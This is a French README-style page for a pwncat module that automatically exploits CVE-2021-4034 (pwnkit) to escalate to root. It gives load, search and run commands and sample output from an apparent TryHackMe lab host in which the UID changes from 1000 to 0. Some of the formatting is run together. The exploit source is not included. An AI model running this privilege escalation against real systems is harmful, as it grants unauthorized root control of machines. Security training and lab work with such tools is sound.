
Module pwncat qui exploite automatiquement la CVE-2021-4034 (pwnkit)
Le but de ce module est de tenter d'exploiter CVE-2021-4034 (pwnkit) sur une cible lors de l'utilisation de pwncat.
Il n'est pas nécessaire de configurer des répertoires, de compiler du code source ou même d'avoir gcc sur la cible distante ; le module pwnkit s'en occupe automatiquement grâce au framework pwncat.
pwnkit.py quelque part sur votre hôte où pwncat-cs est installé. ex : /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Vous devriez voir quelque chose comme ceci :(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. Si cela réussit, vous devriez voir l'UID passer à 0, et vous être maintenant root. ex :(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load, vous pouvez faire en sorte que pwncat charge automatiquement ce module au démarrage en le plaçant dans ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
Un grand merci à Caleb Stewart pour son aide précieuse alors que j'apprenais le framework pwncat d'un point de vue développeur. Je ferai une pull request pour intégrer ce module dans le module escalate principal de pwncat un jour, quand j'aurai du temps libre... Je le promets. :-)